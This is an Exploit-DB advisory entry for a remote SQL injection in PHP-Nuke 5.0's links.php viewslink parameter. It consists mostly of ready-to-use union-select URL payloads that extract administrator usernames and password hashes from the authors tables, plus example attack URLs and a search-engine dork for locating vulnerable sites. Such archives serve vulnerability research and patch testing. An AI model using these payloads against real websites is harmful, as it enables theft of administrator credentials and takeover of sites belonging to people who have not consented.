PHP-NUKE 5.0 - Viewslink Remote SQL Injection

2010-05-05T00:00:00
ID EDB-ID:12514
Type exploitdb
Reporter CMD
Modified 2010-05-05T00:00:00

Description

PHP-NUKE v5.0 viewslink Remote SQL Injection. Webapps exploit for php platform

                                        
                                            # Author: CMD
# Contact: cemede@ilkposta.com
# Dork: [allinurl: op=viewslink&sid=]
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=

# Code :

[

Exploit 1: 
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

           
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*



Exploit 2: 
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/authors/**/where/**/radminsuper=1/*

        
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/authors/**/where/**/radminsuper=1/*

]



=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=

# Example : 

[

Example 1 : 
http://www.target.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

            
http://www.target.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*



Example 2 : 
http://www.target.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/authors/**/where/**/radminsuper=1/*

            
http://www.target.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/authors/**/where/**/radminsuper=1/*

]

=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=

#Thanx : AmeN & MUS4LLAT & Snaritx & JacKal & Metrp0l 
& Ve sayamadıklarım

#Says : Hemşo bak bug buldum xD